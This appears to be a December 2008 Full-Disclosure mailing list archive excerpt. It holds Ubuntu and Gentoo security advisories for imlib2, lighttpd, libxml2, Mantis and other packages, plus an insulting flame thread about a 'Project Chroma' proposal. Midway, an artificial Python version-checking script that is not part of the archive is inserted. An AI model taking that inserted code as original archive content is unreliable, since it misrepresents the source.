http://www.schneier.com/blog/archives/2008/11/the_ill_effects_1.html

"The experts said no one has actually done any research on SIM card
cloning because the activity is illegal in the country."

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/6d3bd465/attachment.bin

From j.sentiar at gmail.com Tue Dec 2 16:00:18 2008
From: j.sentiar at gmail.com (j-f sentier)
Date: Tue, 2 Dec 2008 11:00:18 -0500
Subject: [Full-disclosure] Security industry software license
In-Reply-To: <6f80feaf0812020508k15ab2debvb93fda8237126bef@mail.gmail.com>
References: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> <93B7B87BB2C7472E905D0BE2F3445766@Appiant> <6f80feaf0812020508k15ab2debvb93fda8237126bef@mail.gmail.com>
Message-ID: <6f80feaf0812020800i42a0f362hd81c912abf98a2@mail.gmail.com>

2008/12/2, j-f sentier :
>
> Mike C, Andrew wallace, n3td3v (which are the same person), would you
> please get the fuck out of this FD list ?
> No one wants to hear your bull-shit anymore around here.
>
>
> 2008/12/2, Mike C :
>>
>> On Mon, Dec 1, 2008 at 7:50 PM, Joel Helgeson wrote:
>> > I agree - the biggest BS term in existence is the term
>> "Cyberterror". If my
>> > web server crashes, is it the result of a Jihadist? Do I care?
>>
>>
>> Yes! The kind of exploiter decides the kind of evil thing that would
>> be done from a zombie machine. You wouldn't want your PC to be a part
>> of an enemy state's arsenal, or an extremist religious organization
>> now, would you?
>>
>>
>> --
>> MC
>> Security Researcher
>> Lead, Project Chroma
>> http://sites.google.com/site/projectchromaproject/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/0aa7c6b0/attachment.html

From marc.deslauriers at canonical.com Tue Dec 2 16:24:02 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Tue, 02 Dec 2008 11:24:02 -0500
Subject: [Full-disclosure] [USN-683-1] Imlib2 vulnerability
Message-ID: <1228235042.8552.1.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-683-1          December 02, 2008
imlib2 vulnerability
CVE-2008-5187
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libimlib2 1.2.1-2ubuntu0.3

Ubuntu 7.10:
  libimlib2 1.3.0.0debian1-4ubuntu0.1

Ubuntu 8.04 LTS:
  libimlib2 1.4.0-1ubuntu1.1

Ubuntu 8.10:
  libimlib2 1.4.0-1.1ubuntu1.1

After a standard system upgrade you need to restart any applications that
use Imlib2 to effect the necessary changes.

Details follow:

It was discovered that Imlib2 did not correctly handle certain malformed
XPM images. If a user were tricked into opening a specially crafted image
with an application that uses Imlib2, an attacker could cause a denial of
service and possibly execute arbitrary code with the user's privileges.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/eaa22f8e/attachment.bin

From rholgstad at gmail.com Tue Dec 2 16:50:46 2008
From: rholgstad at gmail.com (rholgstad)
Date: Tue, 02 Dec 2008 10:50:46 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID: <49356766.9050307@gmail.com>

Mike C wrote:
> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
>
>> and how does making a color based on these inputs protect people?
>>
>>
>
> Once all desktops have an icon or widget (say at the right hand
> corner) with the color, and this is consistently seen everywhere, the
> users will start associating with their online security. they will be
> reminded that they have to be careful with the data they share.
>
> This, if implemented correctly will be a boon to security industry,
> where the weakest kinks currently are 'n00b' users.
>
>
you are joking right? So some widget is going to stop the next SMB
remote or IE client side and protect the 'n00b' users? Please explain
how this works. Also please explain how "they will be reminded that
they have to be careful with the data they share. " has anything to do
with protecting a users machine from being compromised.

From rysheve at gmail.com Tue Dec 2 17:13:46 2008
From: rysheve at gmail.com (Chris Jeane)
Date: Tue, 2 Dec 2008 11:13:46 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To: <49356766.9050307@gmail.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com>
Message-ID:

If you are taking a proactive approach to security, maybe you should
always remind the user to be careful with their data.
How about 'all desktops have an icon or widget (say at the right hand
corner)' that flashes red every five minutes and says 'be careful with
the data you share.' This solution removes the overhead of all that
pesky monitoring and data mining.

The internet is a dangerous place, and will continue to be. My 'noob'
grandmother doesn't need a 1-5 Danger Scale to keep her from being
scammed when she buys holiday gifts online.

[Grandmother Voice]
'Ohh dear we are at Internet Danger Level: Tangerine, guess I can't
order those knit socks for Johnny today.'
[End Grandmother Voice]

On Tue, Dec 2, 2008 at 10:50 AM, rholgstad wrote:

> Mike C wrote:
> > On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
> >
> >> and how does making a color based on these inputs protect people?
> >>
> >>
> >
> > Once all desktops have an icon or widget (say at the right hand
> > corner) with the color, and this is consistently seen everywhere, the
> > users will start associating with their online security. they will be
> > reminded that they have to be careful with the data they share.
> >
> > This, if implemented correctly will be a boon to security industry,
> > where the weakest kinks currently are 'n00b' users.
> >
> >

From rbu at gentoo.org Tue Dec 2 17:30:56 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:30:56 +0100
Subject: [Full-disclosure] [ GLSA 200812-03 ] IPsec-Tools: racoon Denial of Service
Message-ID: <200812021831.01771.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: IPsec-Tools: racoon Denial of Service
      Date: December 02, 2008
      Bugs: #232831
        ID: 200812-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

IPsec-Tools' racoon is affected by a remote Denial of Service
vulnerability.

Background
==========

IPsec-Tools is a port of KAME's implementation of the IPsec utilities.
It contains a collection of network monitoring tools, including racoon,
ping, and ping6.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  net-firewall/ipsec-tools        < 0.7.1                   >= 0.7.1

Description
===========

Two Denial of Service vulnerabilities have been reported in racoon:

* The vendor reported a memory leak in racoon/proposal.c that can be
  triggered via invalid proposals (CVE-2008-3651).

* Krzysztof Piotr Oledzk reported that src/racoon/handler.c does not
  remove an "orphaned ph1" (phase 1) handle when it has been initiated
  remotely (CVE-2008-3652).

Impact
======

An attacker could exploit these vulnerabilities to cause a Denial of
Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All IPsec-Tools users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=net-firewall/ipsec-tools-0.7.1"

References
==========

  [ 1 ] CVE-2008-3651
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3651
  [ 2 ] CVE-2008-3652
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3652

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From rbu at gentoo.org Tue Dec 2 17:25:54 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:25:54 +0100
Subject: [Full-disclosure] [ GLSA 200812-01 ] OptiPNG: User-assisted execution of arbitrary code
Message-ID: <200812021825.57032.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OptiPNG: User-assisted execution of arbitrary code
      Date: December 02, 2008
      Bugs: #246522
        ID: 200812-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in OptiPNG might result in user-assisted execution of
arbitrary code.

Background
==========

OptiPNG is a PNG optimizer that recompresses image files to a smaller
size, without losing any information.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  media-gfx/optipng        < 0.6.2                          >= 0.6.2

Description
===========

A buffer overflow in the BMP reader in OptiPNG has been reported.

Impact
======

A remote attacker could entice a user to process a specially crafted
BMP image, possibly resulting in the execution of arbitrary code with
the privileges of the user running the application, or a Denial of
Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OptiPNG users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-gfx/optipng-0.6.2"

References
==========

  [ 1 ] CVE-2008-5101
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5101

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From rbu at gentoo.org Tue Dec 2 17:33:06 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:33:06 +0100
Subject: [Full-disclosure] [ GLSA 200812-04 ] lighttpd: Multiple vulnerabilities
Message-ID: <200812021833.10414.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: lighttpd: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #238180
        ID: 200812-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in lighttpd may lead to information disclosure
or a Denial of Service.

Background
==========

lighttpd is a lightweight high-performance web server.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  www-servers/lighttpd       < 1.4.20                     >= 1.4.20

Description
===========

Multiple vulnerabilities have been reported in lighttpd:

* Qhy reported a memory leak in the http_request_parse() function in
  request.c (CVE-2008-4298).

* Gaetan Bisson reported that URIs are not decoded before applying
  url.redirect and url.rewrite rules (CVE-2008-4359).

* Anders1 reported that mod_userdir performs case-sensitive
  comparisons on filename components in configuration options, which
  is insufficient when case-insensitive filesystems are used
  (CVE-2008-4360).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial
of Service, to bypass intended access restrictions, to obtain sensitive
information, or to possibly modify data.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All lighttpd users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.20"

References
==========

  [ 1 ] CVE-2008-4298
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4298
  [ 2 ] CVE-2008-4359
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4359
  [ 3 ] CVE-2008-4360
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4360

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From rbu at gentoo.org Tue Dec 2 17:28:07 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:28:07 +0100
Subject: [Full-disclosure] [ GLSA 200812-02 ] enscript: User-assisted execution of arbitrary code
Message-ID: <200812021828.12222.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: enscript: User-assisted execution of arbitrary code
      Date: December 02, 2008
      Bugs: #243228
        ID: 200812-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two buffer overflows in enscript might lead to the execution of
arbitrary code.

Background
==========

enscript is a powerful ASCII to PostScript file converter.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-text/enscript      < 1.6.4-r4                      >= 1.6.4-r4

Description
===========

Two stack-based buffer overflows in the read_special_escape() function
in src/psgen.c have been reported. Ulf Harnhammar of Secunia Research
discovered a vulnerability related to the "setfilename" command
(CVE-2008-3863), and Kees Cook of Ubuntu discovered a vulnerability
related to the "font" escape sequence (CVE-2008-4306).

Impact
======

An attacker could entice a user or automated system to process
specially crafted input with the special escapes processing enabled
using the "-e" option, possibly resulting in the execution of arbitrary
code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All enscript users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/enscript-1.6.4-r4"

References
==========

  [ 1 ] CVE-2008-3863
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3863
  [ 2 ] CVE-2008-4306
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4306

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From rbu at gentoo.org Tue Dec 2 17:40:19 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:40:19 +0100
Subject: [Full-disclosure] [ GLSA 200812-05 ] libsamplerate: User-assisted execution of arbitrary code
Message-ID: <200812021840.22230.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libsamplerate: User-assisted execution of arbitrary code
      Date: December 02, 2008
      Bugs: #237037
        ID: 200812-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability in libsamplerate might lead to the
execution of arbitrary code.

Background
==========

Secret Rabbit Code (aka libsamplerate) is a Sample Rate Converter for
audio.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  media-libs/libsamplerate        < 0.1.4                   >= 0.1.4

Description
===========

Russell O'Connor reported a buffer overflow in src/src_sinc.c related
to low conversion ratios.

Impact
======

A remote attacker could entice a user or automated system to process a
specially crafted audio file possibly leading to the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libsamplerate users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=media-libs/libsamplerate-0.1.4"

References
==========

  [ 1 ] CVE-2008-5008
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From rbu at gentoo.org Tue Dec 2 17:42:03 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:42:03 +0100
Subject: [Full-disclosure] [ GLSA 200812-06 ] libxml2: Multiple vulnerabilities
Message-ID: <200812021842.06701.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxml2: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #234099, #237806, #239346, #245960
        ID: 200812-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in libxml2 might lead to execution of
arbitrary code or Denial of Service.

Background
==========

libxml2 is the XML (eXtended Markup Language) C parser and toolkit
initially developed for the Gnome project.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libxml2      < 2.7.2-r1                       >= 2.7.2-r1

Description
===========

Multiple vulnerabilities were reported in libxml2:

* Andreas Solberg reported that libxml2 does not properly detect
  recursion during entity expansion in an attribute value
  (CVE-2008-3281).

* A heap-based buffer overflow has been reported in the
  xmlParseAttValueComplex() function in parser.c (CVE-2008-3529).

* Christian Weiske reported that predefined entity definitions in
  entities are not properly handled (CVE-2008-4409).

* Drew Yao of Apple Product Security reported an integer overflow in
  the xmlBufferResize() function that can lead to an infinite loop
  (CVE-2008-4225).

* Drew Yao of Apple Product Security reported an integer overflow in
  the xmlSAX2Characters() function leading to a memory corruption
  (CVE-2008-4226).

Impact
======

A remote attacker could entice a user or automated system to open a
specially crafted XML document with an application using libxml2,
possibly resulting in the execution of arbitrary code or a high CPU and
memory consumption.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libxml2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1"

References
==========

  [ 1 ] CVE-2008-3281
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281
  [ 2 ] CVE-2008-3529
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529
  [ 3 ] CVE-2008-4409
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409
  [ 4 ] CVE-2008-4225
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225
  [ 5 ] CVE-2008-4226
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From vulcanius at gmail.com Tue Dec 2 17:47:07 2008
From: vulcanius at gmail.com (vulcanius)
Date: Tue, 2 Dec 2008 12:47:07 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com>
Message-ID:

*Sorry for my double posting to you Chris.

All this solution does is take up their resources and piss off the
users who then find ways to get rid of it or circumvent the useless
thing. In the case of Mike C this means they'll be disabling whatever
security software is in place that uses it.

Bravo folks, you've saved the tubes.

On Tue, Dec 2, 2008 at 12:13 PM, Chris Jeane wrote:

If you are taking a proactive approach to security, maybe you should
always remind the user to be careful with their data.
How about 'all desktops have an icon or widget (say at the right hand
corner)' that flashes red every five minutes and says 'be careful with
the data you share.' This solution removes the overhead of all that
pesky monitoring and data mining.

From rbu at gentoo.org Tue Dec 2 17:55:03 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 2 Dec 2008 18:55:03 +0100
Subject: [Full-disclosure] [ GLSA 200812-07 ] Mantis: Multiple vulnerabilities
Message-ID: <200812021855.07412.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200812-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Mantis: Multiple vulnerabilities
      Date: December 02, 2008
      Bugs: #238570, #241940, #242722
        ID: 200812-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Mantis, the most
severe of which leading to the remote execution of arbitrary code.

Background
==========

Mantis is a PHP/MySQL/Web based bugtracking system.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  www-apps/mantisbt      < 1.1.4-r1                      >= 1.1.4-r1

Description
===========

Multiple issues have been reported in Mantis:

* EgiX reported that manage_proj_page.php does not correctly sanitize
  the sort parameter before passing it to create_function() in
  core/utility_api.php (CVE-2008-4687).

* Privileges of viewers are not sufficiently checked before composing
  a link with issue data in the source anchor (CVE-2008-4688).

* Mantis does not unset the session cookie during logout
  (CVE-2008-4689).

* Mantis does not set the secure flag for the session cookie in an
  HTTPS session (CVE-2008-3102).

Impact
======

Remote unauthenticated attackers could exploit these vulnerabilities to
execute arbitrary PHP commands, disclose sensitive issue data, or
hijack a user's sessions.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mantis users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.1.4-r1"

References
==========

  [ 1 ] CVE-2008-3102
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102
  [ 2 ] CVE-2008-4687
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4687
  [ 3 ] CVE-2008-4688
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4688
  [ 4 ] CVE-2008-4689
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4689

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200812-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

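Added example, not part of the advisories above and not Gentoo's own tooling: a Python check that parses the single-range "Affected packages" rows of the seven GLSAs above and reports which installed packages still fall in the vulnerable range, together with the upgrade atom used in each Resolution section. The installed-version inventory is constructed sample data, and the version comparison is a deliberately narrow assumption (dotted integers plus an optional -rN revision, which covers every version in these advisories); any other Portage version syntax is rejected rather than guessed.

```python
"""Check installed versions against GLSA 'Affected packages' rows."""
import operator
import re
from typing import NamedTuple

# One table row: index, category/package, vulnerable range, unaffected range.
ROW_RE = re.compile(
    r"^\s*\d+\s+(?P<atom>[\w+.-]+/[\w+.-]+)"
    r"\s+(?P<vuln_op><=?)\s*(?P<vuln_ver>\S+)"
    r"\s+(?P<ok_op>>=?)\s*(?P<ok_ver>\S+)\s*$"
)
# Assumption: simplified version grammar, dotted integers plus optional -rN.
VERSION_RE = re.compile(r"^(?P<nums>\d+(?:\.\d+)*)(?:-r(?P<rev>\d+))?$")
VULN_OPS = {"<": operator.lt, "<=": operator.le}


class AffectedRow(NamedTuple):
    atom: str
    vuln_op: str
    vuln_ver: str
    ok_op: str
    ok_ver: str


def parse_row(line):
    """Parse one data row of the table; header and rule lines are rejected."""
    m = ROW_RE.match(line)
    if m is None:
        raise ValueError("not a single-range affected-packages row: %r" % line)
    return AffectedRow(**m.groupdict())


def version_key(version):
    """Return a sortable key ((major, minor, ...), revision)."""
    m = VERSION_RE.match(version)
    if m is None:
        raise ValueError("unsupported version syntax: %r" % version)
    parts = m.group("nums").split(".")
    # Portage compares components with a leading zero differently; refuse
    # them instead of returning a possibly wrong ordering.
    if any(len(p) > 1 and p.startswith("0") for p in parts[1:]):
        raise ValueError("leading-zero component not supported: %r" % version)
    return tuple(int(p) for p in parts), int(m.group("rev") or 0)


def is_vulnerable(row, installed):
    """True if the installed version lies inside the row's vulnerable range."""
    return VULN_OPS[row.vuln_op](version_key(installed), version_key(row.vuln_ver))


def upgrade_atom(row):
    """Build the atom form shown in the Resolution sections."""
    return "%s%s-%s" % (row.ok_op, row.atom, row.ok_ver)


def audit(rows, installed):
    """Return sorted (atom, installed version, upgrade atom) findings."""
    findings = []
    for row in rows:
        have = installed.get(row.atom)
        if have is not None and is_vulnerable(row, have):
            findings.append((row.atom, have, upgrade_atom(row)))
    return sorted(findings)


# Data rows taken from GLSA 200812-01 through 200812-07 as posted above.
GLSA_ROWS = """\
  1  net-firewall/ipsec-tools    < 0.7.1      >= 0.7.1
  1  media-gfx/optipng           < 0.6.2      >= 0.6.2
  1  www-servers/lighttpd        < 1.4.20     >= 1.4.20
  1  app-text/enscript           < 1.6.4-r4   >= 1.6.4-r4
  1  media-libs/libsamplerate    < 0.1.4      >= 0.1.4
  1  dev-libs/libxml2            < 2.7.2-r1   >= 2.7.2-r1
  1  www-apps/mantisbt           < 1.1.4-r1   >= 1.1.4-r1
"""

# Constructed inventory for illustration; not taken from any real host.
INSTALLED = {
    "net-firewall/ipsec-tools": "0.7.1",
    "media-gfx/optipng": "0.6.1",
    "www-servers/lighttpd": "1.4.19-r2",
    "app-text/enscript": "1.6.4-r3",
    "media-libs/libsamplerate": "0.1.4",
    "dev-libs/libxml2": "2.7.2",
    "www-apps/mantisbt": "1.1.4-r1",
}


def run_sample():
    rows = [parse_row(line) for line in GLSA_ROWS.splitlines()]
    return audit(rows, INSTALLED)


if __name__ == "__main__":
    for atom, have, fix in run_sample():
        print('%s %s is affected; upgrade with "%s"' % (atom, have, fix))
```

The revision suffix matters for triage: libxml2 2.7.2 and enscript 1.6.4-r3 share the upstream version of the fixed package and are only caught because -rN is compared.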
From ureleet at gmail.com Tue Dec 2 18:08:53 2008
From: ureleet at gmail.com (Ureleet)
Date: Tue, 2 Dec 2008 13:08:53 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com>
Message-ID: <6158bb410812021008u4b0509c7tc3f08cf9f58046e0@mail.gmail.com>

mike c, u r now in the same group as n3td3v. congratulations 4 being a
moron, doing repetitive work, and suggesting nonsensical material.
nice idea. especially if it hadnt already been done. 10x over. o, and
u werent the lead of it. plug urself much? how about u plug ur n3td3v
group 2?

On Tue, Dec 2, 2008 at 12:47 PM, vulcanius wrote:
> *Sorry for my double posting to you Chris.
>
> All this solution does is take up their resources and piss off the users who
> then find ways to get rid of it or circumvent the useless thing. In the case
> of Mike C this means they'll be disabling whatever security software is in
> place that uses it.
>
> Bravo folks, you've saved the tubes.
>
> On Tue, Dec 2, 2008 at 12:13 PM, Chris Jeane wrote:
>
